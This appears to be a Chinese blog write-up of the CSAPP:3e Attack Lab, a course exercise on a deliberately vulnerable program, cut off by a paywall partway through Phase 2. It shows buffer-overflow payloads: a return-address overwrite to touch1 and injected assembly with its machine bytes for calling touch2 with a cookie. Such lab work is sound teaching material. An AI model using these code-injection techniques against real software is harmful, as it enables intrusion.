CSAPP:3e Attacklab实验记录

最新推荐文章于 2024-05-25 18:58:05 发布
最新推荐文章于 2024-05-25 18:58:05 发布
阅读量1.4k 收藏 7
点赞数 3
分类专栏: 深入理解计算机系统 文章标签: 信息安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yiwangruge/article/details/104371355
版权

阅读实验手册,开始做Attacklab.

CTARGET Phase 1

第一个Attack Phase要求调用存在的函数touch1.这个简单,自需要将touch1的首地址覆盖栈中的返回地址就行。
首先使用gdb调试ctarget,反汇编出getbuf的汇编代码:
disas getbuf
可以发现这里分配了0x28(十进制是40)Bytes的栈帧。由于栈是低地址方向增长的,所以只要在%rsp+40的位置存入touch1的起始地址就好。通过反汇编touch1的代码,不难发现touch1的起始地址是0x4017c0:
disas touch1
所以构造字符串,前40个字节随意(但是不能取0A,因为0A是换行符,ctarget程序根据换行符判定输入结束),然后后面跟上0x4017c0(注意此时要转换为小端法表示):
文件
保存为phase1.txt。
输入命令判题:
phase1
Phase1通过。

Phase 2

Phase2要求注入一小段代码,带参数调用touch2(unsigned)函数。
首先在实验手册里看到touch2需要判断一下你的cookie:
CSAPP ATTACKLAB PDF1
这个cookie是程序生成的一个随机数,在启动ctarget程序时有显示。
反汇编touch2函数,发现touch2函数的首地址是0x4017ec:
在这里插入图片描述
准备将代码注入到getbuf的栈帧里,实验手册已经说了ctarget的栈地址是固定的,这就方便了注入代码。在gdb调试下发现栈帧地址是0x5561dc78:
gdb1

先罗列一下已有的信息:
Stack Address:0x5561dc78
function touch2 address:0x00000000004017ec
Cookie:0x59b997fa
然后开始写注入的代码。写的这段代码的目的是为了带参调用touch2.

fun2:
	movl $0x59b997fa,%edi
	pushq $0x4017ec
	ret

汇编出目标文件,再使用objdump -d反汇编到phase2.txt:


phase2.o:     file format elf64-x86-64


Disassembly of section .text:

0000000000000000 <fun2>:
   0:	bf fa 97 b9 59       	mov    $0x59b997fa,%edi
   5:	68 ec 17 40 00       	pushq  $0x4017ec
   a:	c3                   	retq

保留二进制部分,补全40个字节,然后在后面附加上返回到栈帧的地址,
得到文件phase2.txt:

bf fa 97 b9 59       	/* movl   $0x59b997fa,%edi */
最低0.47元/天 解锁文章
鸟临窗语报天晴
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【CSAPP:3e 深入理解计算机系统】课堂笔记 Computer Systems from a Programmer’s Perspective
Hairful的博客
08-29 709
时间局部性:【使用同一个变量进行操作】被引用过一次的内存位置很可能在不远的将来再被多次引用空间局部性:【使用相邻位置的内存】被引用过的内存位置,它附近的内存位置很可能在不远的将来被引用假如多个模块定义了同名的全局符号强符号过程(函数等)已初始化的全局变量弱符号未初始化的全局变量规则不允许多个同名的强符号一个强符号+多个弱符号,选择强符号多个弱符号,随便选避免使用尽量使用static主动初始化假如要引用外部的使用extern。...
CS:APP3e 深入理解计算机系统_3e Attacklab 实验
a_18067的博客
10-22 872
详细的题目要求和资源可以到 http://csapp.cs.cmu.edu/3e/labs.html 或者 http://www.cs.cmu.edu/~./213/schedule.html 获取。 getbuf()实现为: unsigned getbuf() { char buf[BUFFER_SIZE]; Gets(buf); /* 没有边界检查 */ r...
AttackLab实验记录
zxj9_9_5__9_7的博客
05-25 799
AttackLab实验记录
CSAPP--ATTACKLAB实验
qq_53336526的博客
12-08 6949
武汉大学csapp实验attacklab
CSAPP Lab3 - attacklab
GAUSS2021
07-30 487
文章目录Lab3 - attacklabPart I: Code Injection AttacksLevel 1Level 2Level 3Part II: Return-Oriented ProgrammingLevel 2Level 3 Lab3 - attacklab 仔细阅读官网上的说明指南,以下任务均是由指南发布的。 Part I: Code Injection Attacks objdump -d ctarget > ctarget.asm Level 1 第一部分无需注入代码,只需令
csapp实验3-attacklab实验详解
m0_65591847的博客
08-02 738
csapp的attacklab,很有趣的缓冲区溢出攻击实验
CSAPP Lab3 attacklab实验源材料
11-07
CSAPP Lab3 attacklab实验源材料 深入理解计算机系统实验三缓冲区溢出攻击实验源材料
著名的CMU CSAPP:3eLab源码与答案 cmu 15-213
01-12
著名的CMU CSAPP:3e实验,里面包含了原始的Lab源码, 也有相关的书籍,非CS:APP 而是需要准备的知识,例如: c programming language (2nd edition)
CSAPP实验-attacklab
最新发布
06-15
《CSAPP实验-attacklab》是针对计算机系统基础(Computer Systems: A Programmer's Perspective,简称CSAPP)课程的一次实验,主要围绕“Attack Lab”展开。这个实验旨在帮助学生深入理解计算机系统的安全性和攻击...
CSAPP-3e-Solutions:CSAPP 3e解决方案,已从已关闭的gitbook.io迁移到github.io
05-03
CSAPP-3e-解决方案 计算机系统:程序员的观点第三版解决方案建造先决条件x64 linux系统码头工人克隆码git clone https://github.com/DreamAndDead/CSAPP-3e-Solutions.gitcd CSAPP-3e-Solutions拉图像sudo docker ...
CSAPP:我为caspp实验室提供的解决方案
02-04
《CSAPP:我为CASPP实验室提供的解决方案》 在计算机科学与工程领域,"CSAPP"通常指的是《计算机系统:一种程序员的视角》(Computer Systems: A Programmer's Perspective) 这本经典教材。这本书深入浅出地介绍了...
栈的使用(push、pop详解)学习笔记
热门推荐
weixin_42492218的博客
11-14 2万+
概念: 栈是一种数据结构,可以添加或者删除值,不过要遵循“后进先出”的原则。通过 push 操作把数据压入栈中,通过pop操作删除数据;它具有一个属性:弹出的值永远是最近被压入而且仍然在栈中的值。 栈可以实现为一个数组,总是从数组的一端插入和删除元素。这一端被称为栈顶。在x86-64中,程序栈存放在内存中某个区域。栈顶元素的地址是所有栈中元素地址中最低的。(根据惯例,我们的栈是倒过来画的,栈“顶”在图的底部。)栈指针%rsp保存着栈顶元素的地址。 PUSHQ与...
CSAPP-Lab3:AttackLab
qq_39308644的博客
05-24 353
CSAPP:AttackLab
CSAPP3e - x86-64 assembly code analysis - Bomb Lab: phase 5
Jason ZHANG的博客
06-06 2269
首先来看phase_5做了什么: 0000000000401062 : 401062: 53 push %rbx 401063: 48 83 ec 20 sub $0x20,%rsp 401067: 48 89 fb mov %rdi,%rbx
[笔记]计算机基础 4 CSAPP Lab3-AttackLab
Leafing_的博客
04-06 608
总结想说的貌似都在BombLab里说了,只能鼓励自己继续读第4章了。
CSAPP Attack Lab
weixin_62709318的博客
11-23 288
本关我们需要跳转到touch3, 传入touch3的参数是一个字符串,并且这个地址指向的字符串要与cookie的字符串表示相同,在汇编语言中传入的第一个参数存放在rdi寄存器里面,所以我们不仅要将这串字符串放入栈中,我们还要讲rdi的值设置为字符串的首地址。00 00 00 00 00 00 00 00 # 前0x28个字符填充0x00。00 00 00 00 00 00 00 00 # 前0x28个字符填充0x00。fa 18 40 00 00 00 00 00 # touch3地址。
深入理解计算机系统(CSAPP) 实验详解:AttackLab
专业记录代码
11-23 4095
ROP妙处 先复习一下ret的动作 ret时会将当前%rsp指向的值当作地址弹出,使得%rip程序计数器指到该地址的指令处,这个是通用的说法 换一种说法就是,它会直接返回到地址处。 需要注意的地方 指令是指令,栈是栈不要搞混,不管我们指令如何跳,只要不对%rsp进行操作,我们栈指针就是不会改变,ret会间接改变栈指针,因为它有两个动作(先弹出地址给%rip,然后在给%rsp加8)。 明白了上面说的,我们就可以开始讲ROP了 touch2 ---->4 movq %rax
CSAPP:英文版计算机系统入门指南
《深入理解计算机系统:程序员视角》(英文版)是一本由Randal E. Bryant和David R. O'Hallaron编著的专业级计算机科学教材,适用于对计算机系统有初步了解并希望进一步提升英文能力的学习者。该书以编程者的角度...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值